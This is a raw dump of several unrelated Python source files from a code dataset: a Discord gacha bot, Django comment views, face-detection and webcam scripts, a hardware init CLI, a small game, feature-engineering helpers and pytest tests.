info\n discord_user.gacha_info.rare_item_count = F('rare_item_count') + item_rank_count[0]\n discord_user.gacha_info.epic_item_count = F('epic_item_count') + item_rank_count[1]\n discord_user.gacha_info.unique_item_count = F('unique_item_count') + item_rank_count[2]\n discord_user.gacha_info.legendary_item_count = F('legendary_item_count') + item_rank_count[3]\n\n # make text to inform the user of items obtained\n text_item_rank_count = f'Rare: `{item_rank_count[0]}` | Epic: `{item_rank_count[1]}` | '\n text_item_rank_count += f'Unique: `{item_rank_count[2]}` | Legendary: `{item_rank_count[3]}`'\n\n if rolls == 1:\n desr = f'Job: {job_processed}'\n else:\n desr = f'Job: {job_processed}\\n {text_item_rank_count}'\n\n embed = discord.Embed(\n title=f'Kết quả mở Treasure Box {rolls} lần của [{author.display_name}]',\n description=desr,\n colour=discord.Color.teal())\n\n for item_result in display_result:\n text_info = f'Rank: **{item_result[\"rank\"]}**\\nType: **{item_result[\"sub_type\"]}**\\nStat:\\n'\n for key, value in 
item_result['stat'].items():\n text_info += f'+ **{key}: {value}**\\n'\n embed.add_field(\n name=item_result['name'],\n value=text_info)\n\n discord_user.gacha_info.save()\n discord_user.gacha_info.refresh_from_db()\n crystals = '{:,}'.format(discord_user.gacha_info.crystal_owned)\n embed.set_footer(\n text=f'Bạn còn [💎 x{crystals}] trong tài khoản.',\n icon_url='https://i.imgur.com/Sh9kXA8.png')\n await context.say_as_embed(embed=embed)\n\n @commands.command(name='glist')\n @commands.check(is_treasure_box_channel)\n async def gachalist(self, context):\n prefix = self.bot.command_prefix\n job_abbrs = [\n ('Dark Knight', 'dk'),\n ('Bowmaster', 'bm'),\n ('Bishop', 'bs'),\n ('Night Lord', 'nl'),\n ('Corsair', 'cs'),\n\n ('Dawn Warrior', 'dw'),\n ('Wind Archer', 'wa'),\n ('Blaze Wizard', 'bw'),\n ('Night Walker', 'nw'),\n ('Thunder Breaker', 'tb'),\n\n ]\n\n author = context.author\n self.check_user_in_db(author.id, author.name)\n\n text_job_abbrs = 'Viết tắt | Tên Job\\n'\n for job in job_abbrs:\n text_job_abbrs += f'{job[1]} : {job[0]}\\n'\n\n embed = discord.Embed(\n title='Danh sách Job và các tên viết tắt dùng để quay rương',\n description=f'```{text_job_abbrs}```\\n'\n f'**Lệnh quay rương**\\n'\n f'• `{prefix}gs viết_tắt` (1 lần)\\n'\n f'• `{prefix}g viết_tắt` (10+1 lần)\\n'\n f'Ví dụ quay rương 10+1 lần cho Dark Knight: `{prefix}g dk`\\n',\n colour=discord.Color.teal())\n await context.send(embed=embed)\n\n @commands.command(name='gdaily')\n @commands.check(is_treasure_box_channel)\n async def gachadaily(self, context):\n\n author = context.author\n discord_user = self.check_user_in_db(author.id, author.name)\n\n # check if user already redeemed crystals\n if discord_user.gacha_info.daily_checked():\n embed = discord.Embed(\n title=None,\n description='Bạn đã nhận :gem: hôm nay rồi nhé. 
Vui lòng thử lại **sau 00:00 sáng mai**.',\n colour=discord.Color.teal())\n await context.send(embed=embed)\n return\n\n # gives the user crystals\n vn_tz = timezone('Asia/Ho_Chi_Minh')\n discord_user.gacha_info.daily_check = datetime.now().astimezone(vn_tz)\n discord_user.gacha_info.crystal_owned = F('crystal_owned') + 10000\n discord_user.gacha_info.save()\n\n discord_user.gacha_info.refresh_from_db()\n crystals = '{:,}'.format(discord_user.gacha_info.crystal_owned)\n\n embed = discord.Embed(\n title=None,\n description=f'{author.mention} đã nhận :gem: x10,000 vào tài khoản quay rương!\\n'\n f'Hiện tại bạn đang có **:gem: x{crystals}**.',\n colour=discord.Color.teal())\n await context.send(embed=embed)\n\n @commands.command(name='ginfo')\n @commands.check(is_treasure_box_channel)\n async def gachainfo(self, context):\n\n author = context.author\n\n # check for user in db, create one if not present\n discord_user = self.check_user_in_db(author.id, author.name)\n gacha_info = discord_user.gacha_info\n\n # add thousand separator\n owned = '{:,}'.format(gacha_info.crystal_owned)\n used = '{:,}'.format(gacha_info.crystal_used)\n\n embed = discord.Embed(\n title=f'Thông tin rương đồ của {author.display_name}',\n description=None,\n colour=discord.Color.teal())\n embed.add_field(\n name='Pha lê',\n value=f'• Đang có: :gem: x**{owned}**\\n• Đã dùng: :gem: x**{used}**',\n inline=False)\n embed.add_field(\n name='Rương đồ',\n value=f'• Rare: **{gacha_info.rare_item_count}**\\n'\n f'• Epic: **{gacha_info.epic_item_count}**\\n'\n f'• Unique: **{gacha_info.unique_item_count}** (**{gacha_info.unique_emblem_item_count}** món có nền (Emblem))\\n'\n f'• Legendary: **{gacha_info.legendary_item_count}** (**{gacha_info.legendary_emblem_item_count}** món có nền (Emblem))\\n',\n inline=False)\n\n # check for daily Crystal redemption\n if discord_user.gacha_info.daily_checked() is True:\n text_daily_checked = 'Đã nhận hôm nay.'\n else:\n text_daily_checked = f'Chưa nhận, dùng lệnh `{self.bot.command_prefix}gdaily` để nhận :gem:.'\n embed.add_field(\n name='Nhận 💎 hằng ngày',\n value=text_daily_checked)\n # set the thumbnail image for better visualizations\n embed.set_thumbnail(url='https://i.imgur.com/Sj2rPTN.png')\n await context.send(embed=embed)\n\n def check_user_in_db(self, user_id, user_name):\n discord_user, created = DiscordUser.objects.get_or_create(discord_id=user_id, defaults={'discord_name': user_name})\n gacha_info, created = GachaInfo.objects.get_or_create(discord_user=discord_user)\n return discord_user\n\n @gacha.error\n @gachalist.error\n @gachadaily.error\n @gachainfo.error\n async def gacha_error(self, error, context):\n print(error)\n return\n\n\ndef setup(bot):\n bot.add_cog(Gacha(bot))\n","sub_path":"francis/cogs/old/gacha.py","file_name":"gacha.py","file_ext":"py","file_size_in_byte":17542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"539721224","text":"import json\nfrom uuid import uuid4\nfrom user.models import Users\nfrom post.models import Posts\nfrom comment.models import Comments\nfrom lifesnap.util import JSONResponse\nfrom django.views import View\nfrom django.http import HttpRequest\nfrom django.core.exceptions import ObjectDoesNotExist\n\n\nclass CommentCreate(View):\n \"\"\" Create a comment for a post\n required json object {\n 'postid': the id of the post to comment,\n 'userid': the user id of the author of the comment,\n 'message': the comment itself\n }\n returned json object {\n 'commentid': the new comment id\n 
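In gacha.py above, the emote selection tests sub_type.type.type == 'Armor' twice, so the :ring: branch is unreachable dead code. The second test presumably meant a third item type; 'Accessory' is a guess here, since the real type name does not appear in this dump:

    if sub_type.type.type == 'Weapon':
        display_data.update({'name': f':crossed_swords: {gacha.item.name}'})
    elif sub_type.type.type == 'Armor':
        display_data.update({'name': f':shield: {gacha.item.name}'})
    elif sub_type.type.type == 'Accessory':  # was a duplicate 'Armor' test
        display_data.update({'name': f':ring: {gacha.item.name}'})
    else:
        display_data.update({'name': gacha.item.name})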
}\n \"\"\"\n def post(self, request: HttpRequest):\n try:\n req_json = json.loads(request.body.decode('UTF-8'))\n except json.JSONDecodeError:\n return JSONResponse.new(code=400, message='json decode error, bad data sent to the server')\n\n message = req_json.get('message')\n if message is None or len(message) > 255:\n return JSONResponse.new(code=400, message='message bad data: {}'.format(message))\n\n try:\n post = Posts.objects.get(post_id__exact=req_json.get('postid'))\n user = Users.objects.get(user_id__exact=req_json.get('userid'))\n except ObjectDoesNotExist:\n return JSONResponse.new(code=400, message='post {} or user {} was not found'.format(req_json.get('postid'), req_json.get('userid')))\n\n if user.is_active is False:\n return JSONResponse.new(code=400, message='user id {} must be logged in'.format(user.user_id))\n\n comment = Comments()\n comment.comment_id = uuid4().time_mid\n comment.author_id = user.user_id\n comment.author_name = user.user_name\n comment.message = message\n comment.save()\n post.comments_set.add(comment)\n\n return JSONResponse.new(code=200, message='success', commentid=comment.comment_id)\n\n\nclass CommentDelete(View):\n \"\"\" Delete a comment from a post\n required json object {\n 'userid': the id of the user who owns the comment,\n 'commentid': the id of the comment to delete\n }\n \"\"\"\n def post(self, request: HttpRequest):\n try:\n req_json = json.loads(request.body.decode('UTF-8'))\n except json.JSONDecodeError:\n return JSONResponse.new(code=400, message='json decode error, bad data sent to the server')\n\n try:\n user = Users.objects.get(user_id__exact=req_json.get('userid'))\n comment = Comments.objects.get(comment_id__exact=req_json.get('commentid'))\n except ObjectDoesNotExist:\n return JSONResponse.new(code=400, message='user {} or comment {} is not found'.format(req_json.get('userid'), req_json.get('commentid')))\n\n if user.is_active is False:\n return JSONResponse.new(code=400, message='user id {} must be logged in'.format(user.user_id))\n\n if user.user_id != comment.author_id:\n return JSONResponse.new(code=400, message='user {} is not the authoer of comment {}'.format(user.user_id, comment.author_id))\n\n comment.delete()\n return JSONResponse.new(code=200, message='success', commentid=comment.comment_id)\n\n\n\nclass CommentLike(View):\n \"\"\" Return or update the like count for the comment\n GET: returned json object {\n 'count': the like count\n }\n POST: required json object {\n 'userid': the user id of the user who is liking the comment,\n 'commentid': the comment the user is liking\n }\n POST: returned json object {\n 'count': the new like count\n }\n \"\"\"\n def get(self, request: HttpRequest, commentid: str):\n commentid = int(commentid)\n\n try:\n comment = Comments.objects.get(comment_id__exact=commentid)\n except ObjectDoesNotExist:\n return JSONResponse.new(code=400, message='comment id {} is not found'.format(commentid))\n\n return JSONResponse.new(code=200, message='success', count=comment.like_count)\n\n def post(self, request: HttpRequest):\n try:\n req_json = json.loads(request.body.decod('UTF-8'))\n except json.JSONDecodeError:\n return JSONResponse.new(code=400, message='json decode error, bad data sent to the server')\n\n try:\n user = User.objects.get(user_id__exact=req_json.get('userid'))\n comment = Comments.objects.get(comment_id__exact=req_json.get('commentid'))\n except ObjectDoesNotExist:\n return JSONResponse.new(code=400, message='userid {} or commentid {} is not found'.format(req_json.get('userid'), 
req_json.get('commentid')))\n\n if user.is_active is False:\n return JSONResponse.new(code=400, message='user id {} must be logged in'.format(user.user_id))\n\n comment.like_count += 1\n comment.save()\n return JSONResponse.new(code=200, message='success', count=comment.like_count)\n","sub_path":"comment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"43285700","text":"import glob\nimport tqdm\nimport os\nimport numpy as np\nimport argparse\nimport cv2\nimport shutil\nimport logging\n\nlogging.getLogger().setLevel(logging.INFO)\n\nfrom retinaface.retina_detector import RetinaDetector\nfrom PIL import Image\n\nparser = argparse.ArgumentParser(description='Retinaface')\nparser.add_argument('-m', '--trained_model', default='/home/pdd/Desktop/workspace/Valid_face_dataset/retinaface/weights/mobilenet0.25_Final.pth',\n type=str, help='Trained state_dict file path to open')\nparser.add_argument('--vis-thres', default=0.5, type=float, help='visualization_threshold')\nparser.add_argument('--padding', type=int, default=5, help=\"padding to detect cropped face\")\nparser.add_argument('--invalid-out-path', default=\"/home/pdd/Desktop/workspace/Valid_face_dataset/new_dataset/fake\", help=\"path to cropped face of real dtset\")\nargs = parser.parse_args()\n\nif __name__==\"__main__\":\n detector = RetinaDetector('cpu', args.trained_model, verbose=True)\n input_folder = \"new_dataset/real/*.jpg\"\n fake_idx = len(os.listdir(\"/home/pdd/Desktop/workspace/Valid_face_dataset/new_dataset/fake\"))\n os.makedirs(args.invalid_out_path, exist_ok=True)\n\n for idx, img_path in tqdm.tqdm(enumerate(glob.glob(input_folder))):\n img = np.array(Image.open(img_path))\n dets = detector.detect_from_image(img)\n for b in dets:\n if b[4] < args.vis_thres:\n continue\n b = list(map(int, b))\n h, w, _ = img.shape\n if b[0] - args.padding < 0 or b[2] + args.padding > h or b[1] - args.padding < 0 or b[3] + args.padding > w:\n shutil.move(img_path, os.path.join(args.invalid_out_path, \"{}.jpg\".format(fake_idx)))\n fake_idx+=1\n break\n\n # os.makedirs(\"./new_dataset/real\", exist_ok=True)\n # os.makedirs(\"./new_dataset/fake\", exist_ok=True)\n # [shutil.copy(img_path, \"./new_dataset/real/{}.jpg\".format(idx)) \\\n # for idx, img_path in tqdm.tqdm(enumerate(glob.glob(\"new_dataset/*/real*.jpg\")))]\n # [shutil.copy(img_path, \"./new_dataset/fake/{}.jpg\".format(idx)) \\\n # for idx, img_path in tqdm.tqdm(enumerate(glob.glob(\"new_dataset/*/fake*.jpg\")))]\n #fake 17670 real 21269 18967","sub_path":"invalid_detect.py","file_name":"invalid_detect.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"332062491","text":"import snap_board\nimport logging\nimport sys\n\ndef cmd_tool(args=None):\n from argparse import ArgumentParser\n p = ArgumentParser(description='snap_init HOST BOF_FILE [OPTIONS]')\n p.add_argument('host', type=str, default='', help='specify the host name')\n p.add_argument('bof', type=str, default='', help='specify the bof file to load unto FPGA')\n p.add_argument('-d', '--demux', dest='demux_mode', type=int, default=2,\n help='Set demux mode 1/2/4') # add the explanation of different demux modes\n p.add_argument('-g', '--gain', dest='gain', type=int, default=1,\n help='Possible gain values (choose one): { 1 1.25 2 2.5 4 5 8 10 12.5 16 20 25 32 50 }, default is 1')\n p.add_argument('-k', 
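In comment/views.py above, CommentLike.post has two errors: request.body.decod('UTF-8') drops the final 'e' of decode and raises AttributeError before json.loads ever runs, and User.objects.get refers to a name that was never imported (the model comes in as Users). The corrected lookups:

    try:
        req_json = json.loads(request.body.decode('UTF-8'))  # was .decod
    except json.JSONDecodeError:
        return JSONResponse.new(code=400, message='json decode error, bad data sent to the server')

    try:
        user = Users.objects.get(user_id__exact=req_json.get('userid'))  # was User
        comment = Comments.objects.get(comment_id__exact=req_json.get('commentid'))
    except ObjectDoesNotExist:
        return JSONResponse.new(code=400, message='userid {} or commentid {} is not found'.format(
            req_json.get('userid'), req_json.get('commentid')))

And in invalid_detect.py above, the border test compares x-coordinates against the image height and y-coordinates against the width (h, w, _ = img.shape, while b[0]/b[2] are x and b[1]/b[3] are y). Swapping the bounds fixes it:

    h, w, _ = img.shape
    if (b[0] - args.padding < 0 or b[2] + args.padding > w or
            b[1] - args.padding < 0 or b[3] + args.padding > h):
        # face touches the frame border: move it to the invalid set
        shutil.move(img_path, os.path.join(args.invalid_out_path, "{}.jpg".format(fake_idx)))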
'--katcp_port', dest='katcp_port', type=int, default=7147,\n help='KATCP port to use (default 7147)')\n p.add_argument('-c', '--chips', nargs='+', dest='chips', type=str, default='all',\n help='Input chips you wish to calibrate. Default all chips: a b c.')\n p.add_argument('-s', '--silent', action='store_true', default=False,\n help='Silence all logging info.')\n p.add_argument('-v', '--verbose', action='store_true', default=False,\n help='Verbose mode, for debugging.')\n \n try:\n args = p.parse_args()\n except:\n p.print_help()\n sys.exit(0)\n \n # define an ADC16 class object and pass it keyword arguments\n s = snap_board.SnapBoard(args.host, args.katcp_port, uses_adc=True, timeout=10)\n \n if args.verbose:\n s.logger.setLevel(logging.DEBUG)\n s.adc.logger.setLevel(logging.DEBUG)\n elif not args.silent:\n s.logger.setLevel(logging.INFO)\n s.adc.logger.setLevel(logging.INFO)\n \n if not args.silent:\n print(\"Programming %s with %s\" % (args.host, args.bof))\n \n s.program(boffile=args.bof, \n chips=args.chips, \n demux_mode=args.demux_mode, \n gain=args.gain)\n \n if not args.silent:\n print(\"DONE.\")\n\n\nif __name__ == \"__main__\":\n cmd_tool()\n","sub_path":"snap_control/snap_init.py","file_name":"snap_init.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"517310580","text":"import random\nrock = '''\n _______\n---' ____)\n (_____)\n (_____)\n (____)\n---.__(___)\n'''\n\npaper = '''\n _______\n---' ____)____\n ______)\n _______)\n _______)\n---.__________)\n'''\n\nscissors = '''\n _______\n---' ____)____\n ______)\n __________)\n (____)\n---.__(___)\n'''\n\n# Write your code below this line 👇\n\n\"\"\"\n Roles for Rock, Paper and Scissors\n * Rock wind against scissors\n * Scissors win against paper\n * Paper wins against rock\n\"\"\"\n\n\nimages = [rock, paper, scissors]\n\nchose = int(input(\"Whaat do you chose? Type 0 for Rock, 1 for Paper or 2 for Scissors\\n\"))\n\nif chose >= 3 or chose < 0:\n print(\"You typed an invalid number, you lose!\")\nelse:\n\n print(images[chose])\n\n # ambos os limites estão inclusos. Tando o inicio como o fim\n computer_chose = random.randint(0, 2)\n print(\"Computer chose\")\n print(images[computer_chose])\n\n \"\"\"\n As combinações que encontrei:\n 0-2 2-0\n 0-1 1-0\n 1-2 2-1\n 2-0 0-2\n \"\"\"\n\n # 0-2 2-0\n if chose == 0 and computer_chose == 2:\n print(\"You win\")\n elif chose == 2 and computer_chose == 0:\n print(\"You lose\")\n\n # \"\"\"\n # Lembre-se, aqui será satisfeita apenas uma opção. Não é multi-if. Ou seja, se um if for satisfeito, o programa não\n # ira continuar testando o restante. Pois se encontrar um if que o satisfaça, ele ira o executar.\n\n # Desta forma, se passou pelos testes anteriores e não foram satisfeitos, não será feito novamente.\n\n # As condições anteriores tratam das comparações entre 2 e 0, e 0 e 2. Logo, se chegou até aqui, é obvio que não será uma\n # comparação entre 2 e 0 ou 0 e 2, porque se fossem, não teriam chegado até aqui. 
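In snap_init.py above, the bare except around parse_args also catches the SystemExit that argparse raises for bad arguments, re-prints the help, and then exits with status 0, which makes failures look like success to shell scripts. argparse already prints usage and exits non-zero on its own, so the try/except can simply be dropped:

    args = p.parse_args()  # argparse prints usage and exits non-zero on error

Note also that --chips defaults to the string 'all' while nargs='+' yields a list, so downstream code must accept both types.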
Logo, trato de opções diferentes.\n # \"\"\"\n\n elif chose > computer_chose:\n print(\"You win\")\n elif chose < computer_chose:\n print(\"You lose\")\n elif chose == computer_chose:\n print(\"It's a draw\")","sub_path":"Courses/100_Days_of_Code_-_The_Complete_Python_Pro_Bootcamp_for_2022/Day_4/rock_paper_scissors.py","file_name":"rock_paper_scissors.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"136623359","text":"from modules import config\r\nfrom modules.feature_engineering import helpers\r\n\r\n\r\ndef sequence_end_feat(data):\r\n # get only the numbers\r\n numbers = data[config.NUM_LIST]\r\n feat_list = []\r\n for i, row in numbers.iterrows():\r\n row_list = sorted([row[n] for n in config.NUM_LIST])\r\n feat_list += [helpers.get_sequence_end(row_list)]\r\n data[config.SEQ_END] = feat_list\r\n return data\r\n\r\n\r\ndef max_same_colour_count_feat(data):\r\n # get only the colours\r\n colours = data[config.CLR_LIST]\r\n feat_list = []\r\n for i, row in colours.iterrows():\r\n row_list = [row[c] for c in config.CLR_LIST]\r\n feat_list += [helpers.get_max_same_colour_count(row_list)]\r\n data[config.SAME_CLR] = feat_list\r\n return data\r\n\r\n\r\ndef max_values_count_feat(data):\r\n # get only the numbers\r\n numbers = data[config.NUM_LIST]\r\n feat_list = [[]] * 2\r\n feat_list[0] = []\r\n feat_list[1] = []\r\n for i, row in numbers.iterrows():\r\n row_list = [row[n] for n in config.NUM_LIST]\r\n temp1, temp2 = helpers.max_values_count_feat_count(row_list)\r\n feat_list[0] += [temp1]\r\n feat_list[1] += [temp2]\r\n data[config.MAX_SAME_NUM] = feat_list[0]\r\n data[config.SEC_MAX_SAME_NUM] = feat_list[1]\r\n return data\r\n","sub_path":"modules/feature_engineering/heuristic_features.py","file_name":"heuristic_features.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"430857072","text":"\"\"\"Tests for queries.py using pytest.\"\"\"\n# pylint: disable=redefined-outer-name\n\nimport json\nfrom os.path import dirname\n\nimport pytest\nfrom pymongo.errors import ServerSelectionTimeoutError\n\nfrom minedatabase import databases, queries\n\nfrom minedatabase.databases import MINE\n\n\n@pytest.fixture()\ndef test_db():\n \"\"\"Create a test MINE database. Created and torn down before and after each\n test it is used in.\"\"\"\n try:\n testdb = MINE(\"mongotest\")\n except ServerSelectionTimeoutError:\n print('No Mongo DB server detected')\n yield testdb\n\n\n@pytest.fixture()\ndef test_molfile():\n \"\"\"Mol file for glucose compound.\"\"\"\n test_molfile = open(dirname(__file__) + \"/data/glucose.mol\", \"r\").read()\n return test_molfile\n\n\n@pytest.fixture()\ndef glucose():\n \"\"\"MongoDB document (.json) for glucose compound.\"\"\"\n with open(dirname(__file__) + '/data/glucose.json') as infile:\n glucose = json.load(infile)\n return glucose\n\n\n@pytest.fixture\ndef glucose_id():\n \"\"\"ID in MongoDB for glucose.\"\"\"\n glucose_id = {'_id': 'Ccffda1b2e82fcdb0e1e710cad4d5f70df7a5d74f'}\n return glucose_id\n\n\ndef test_quick_search(test_db, glucose, glucose_id):\n \"\"\"\n GIVEN a quick search query (e.g. 
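For non-Portuguese readers, the comments in rock_paper_scissors.py above say, in short: random.randint includes both endpoints, and because an if/elif chain runs only its first matching branch, the 0-vs-2 and 2-vs-0 pairs are settled first, leaving the remaining branches free to decide by simple ordering (chose > computer_chose wins, < loses, == draws). Separately, in heuristic_features.py above, feat_list = [[]] * 2 creates two references to one list; the function survives only because both slots are immediately rebound, and writing two independent lists avoids the trap:

    first_feats, second_feats = [], []  # two distinct lists, no aliasing
    for i, row in numbers.iterrows():
        row_list = [row[n] for n in config.NUM_LIST]
        temp1, temp2 = helpers.max_values_count_feat_count(row_list)
        first_feats.append(temp1)
        second_feats.append(temp2)
    data[config.MAX_SAME_NUM] = first_feats
    data[config.SEC_MAX_SAME_NUM] = second_feats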
glucose identifiers)\n WHEN quick search is used to search based on that query\n THEN make sure that quick search provides the correct results\n \"\"\"\n assert glucose not in queries.quick_search(test_db,\n 'WQZGKKKJIJFFOK-UHFFFAOYSA-N')\n assert glucose in queries.quick_search(\n test_db, 'InChIKey=WQZGKKKJIJFFOK-GASJEMHNSA-N')\n assert glucose in queries.quick_search(\n test_db, \"Ccffda1b2e82fcdb0e1e710cad4d5f70df7a5d74f\")\n assert glucose in queries.quick_search(test_db, \"917030\")\n assert glucose in queries.quick_search(test_db, \"cpd00027\")\n assert glucose in queries.quick_search(test_db, 'C00031')\n assert glucose in queries.quick_search(test_db, 'Glucose')\n assert glucose_id in queries.quick_search(\n test_db, 'WQZGKKKJIJFFOK-GASJEMHNSA-N', {'_id': 1})\n\n\ndef test_database_query(test_db, glucose, glucose_id):\n \"\"\"\n GIVEN an andvanced search query (e.g. a MINE id)\n WHEN advanced search is used to search based on that query\n THEN make sure that advanced search provides the correct results\n \"\"\"\n with pytest.raises(ValueError):\n queries.advanced_search(databases.MINE('admin'), \"{'MINE_id': 19160}\")\n with pytest.raises(ValueError):\n queries.advanced_search(test_db, \"\")\n assert queries.advanced_search(test_db, \"{'MINE_id': 917030}\") == [glucose]\n assert queries.advanced_search(test_db,\n \"{'Names': 'Glucose'}\") == [glucose]\n assert queries.advanced_search(test_db, \"{'MINE_id': 917030}\",\n {'_id': 1}) == [glucose_id]\n\n\ndef test_similarity_search(test_db, test_molfile, glucose):\n \"\"\"\n GIVEN a similary search query\n WHEN similarity search is used to search based on that query\n THEN make sure the similarity search provides the correct results\n \"\"\"\n assert len(queries.similarity_search(\n test_db, 'Cc1cc2c(cc1C)N(CC(O)C(O)C(O)COP(=O)(O)OP(=O)(O)OCC1OC(n3cn'\n 'c4c(N)ncnc43)C(O)C1O)c1nc(O)nc(O)c1N2', 0.9, 100)) == 8\n result = queries.similarity_search(test_db, test_molfile, 0.5, 100,\n fp_type='MACCS')\n assert glucose in result\n assert len(result) == 3\n\n\ndef test_substructure_search(test_db, glucose):\n \"\"\"\n GIVEN a substructure search query\n WHEN substructure search is used to search based on that query\n THEN make sure that substructure search provides the correct results\n \"\"\"\n result = queries.substructure_search(test_db, \"CO\", 100)\n assert glucose in result\n assert len(result) == 22\n result = queries.substructure_search(test_db, 'O=P(O)(O)O', 100)\n assert len(result) == 15\n assert isinstance(result[0], dict)\n\n\ndef test_structure_search(test_db, test_molfile, glucose):\n \"\"\"\n GIVEN a structure search query\n WHEN structure search is used to search based on that query\n THEN make sure that structure search provides the correct results\n \"\"\"\n assert glucose in queries.structure_search(\n test_db, 'OC[C@H]1OC(O)[C@H](O)[C@@H](O)[C@@H]1O', True)\n assert glucose in queries.structure_search(test_db, test_molfile, False)\n","sub_path":"tests/test_queries.py","file_name":"test_queries.py","file_ext":"py","file_size_in_byte":4413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"599930019","text":"import numpy as np\nimport cv2\nfrom mtcnn.mtcnn import MTCNN\n\ndetector = MTCNN()\nvideo_capture = cv2.VideoCapture(0)\nwhile True:\n # Capture frame-by-frame\n ret, frame = video_capture.read()\n frame = cv2.flip(frame, 1)\n image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n result = detector.detect_faces(image)\n\n # Result is an array with all the bounding boxes 
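In test_queries.py above, the test_db fixture prints a warning when no Mongo server is reachable and then yields testdb, which is unbound in that case, so every dependent test dies with a NameError instead of being skipped. Skipping from inside the fixture is one conventional fix:

    @pytest.fixture()
    def test_db():
        """Create a test MINE database, skipping when MongoDB is unreachable."""
        try:
            testdb = MINE("mongotest")
        except ServerSelectionTimeoutError:
            pytest.skip('No Mongo DB server detected')
        yield testdb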
detected.\n bounding_box = result[0]['box']\n keypoints = result[0]['keypoints']\n cv2.rectangle(frame,\n (bounding_box[0], bounding_box[1]),\n (bounding_box[0]+bounding_box[2], bounding_box[1] + bounding_box[3]),\n (0,155,255),\n 2)\n cv2.circle(frame,(keypoints['left_eye']), 3, (0,155,255), 2)\n cv2.circle(frame,(keypoints['right_eye']), 2, (0,155,255), 2)\n cv2.circle(frame,(keypoints['nose']), 3, (0,155,255), 2)\n cv2.circle(frame,(keypoints['mouth_left']), 3, (0,155,255), 2)\n cv2.circle(frame,(keypoints['mouth_right']), 3, (0,155,255), 2)\n\n cv2.line(frame,(keypoints['left_eye']),keypoints['right_eye'], (0,0,255), 1)\n cv2.line(frame,(keypoints['left_eye']),keypoints['nose'], (0,255,0), 2)\n cv2.line(frame,(keypoints['right_eye']),keypoints['nose'], (255,0,0), 2)\n \n dX = keypoints['right_eye'][0] - keypoints['left_eye'][0]\n dY = keypoints['right_eye'][1] - keypoints['left_eye'][1]\n dist_norm = np.sqrt((dX ** 2) + (dY ** 2))\n \n dX = keypoints['left_eye'][0] - keypoints['nose'][0]\n dY = keypoints['left_eye'][1] - keypoints['nose'][1]\n dist_left = np.sqrt((dX ** 2) + (dY ** 2))\n\n dX = keypoints['right_eye'][0] - keypoints['nose'][0]\n dY = keypoints['right_eye'][1] - keypoints['nose'][1]\n dist_right = np.sqrt((dX ** 2) + (dY ** 2))\n\n # Normalized Features-distances\n input_left = dist_left/dist_norm\n input_right = dist_right/dist_norm\n\n cv2.putText(frame, str(input_left), (50,50), \n cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 255, 0), lineType=cv2.LINE_AA) \n cv2.putText(frame, str(input_right), (50,100), \n cv2.FONT_HERSHEY_SIMPLEX, 1.0, (255, 0, 0), lineType=cv2.LINE_AA)\n \n print('FRAME')\n print(input_left)\n print(input_right)\n \n #print(result)\n\n # Display the resulting frame\n cv2.imshow('Video', frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n# When everything is done, release the capture\nvideo_capture.release()\ncv2.destroyAllWindows()","sub_path":"PYTHON/Projects/faceRecognitions/itwork/jdscbj2/Pack2.py","file_name":"Pack2.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"287997191","text":"#!/usr/bin/env python\nimport os\nimport time\nfrom sqlalchemy import create_engine\nimport pandas as pd\nimport django\nimport datetime\nimport math\nimport numpy as np\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"datasite.settings\")\ndjango.setup()\n\nfrom chpa_data.views import *\nfrom vbp.models import *\nfrom rdpac.models import *\n\nengine = create_engine(\"mssql+pymssql://(local)/CHPA_1806\")\ntable = \"data\"\n\nD_BOOLEAN = {\"是\": True, \"否\": False}\n\n\ndef importModel(dict):\n for key in dict:\n sql = \"SELECT Distinct \" + key + \" FROM \" + table\n df = pd.read_sql(sql=sql, con=engine)\n df.dropna(inplace=True)\n print(df)\n l = []\n for item in df.values:\n l.append(dict[key](name=item[0]))\n\n dict[key].objects.all().delete()\n dict[key].objects.bulk_create(l)\n\n\n\"\"\"以下部分为vbp导入模块\"\"\"\n\n\ndef import_tender():\n df = pd.read_excel(\"vbp.xlsx\", sheet_name=\"第四轮集采\", header=0)\n df = df.drop_duplicates(\"药品通用名\")\n # pivoted = pd.pivot_table(df, index='药品通用名', values='最高限价', aggfunc=np.mean)\n # d = pivoted.to_dict()['最高限价']\n\n l = []\n for tender in df.values:\n print(tender)\n tender_begin = datetime.datetime.strptime(\"01-05-2021\", \"%d-%m-%Y\")\n l.append(\n Tender(\n target=tender[1],\n vol=\"第四轮45品种\",\n tender_begin=tender_begin,\n ceiling_price=tender[9],\n )\n )\n\n Tender.objects.bulk_create(l)\n\n\ndef import_volume():\n df = 
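The webcam loop above indexes result[0] unconditionally, so the script raises IndexError the moment no face is in frame (MTCNN returns an empty list then). A minimal guard that keeps the drawing code unchanged:

    result = detector.detect_faces(image)
    if not result:
        cv2.imshow('Video', frame)  # still show the raw frame
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
        continue
    bounding_box = result[0]['box']
    keypoints = result[0]['keypoints']
    # ...draw the box, landmarks and normalized distances as above...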
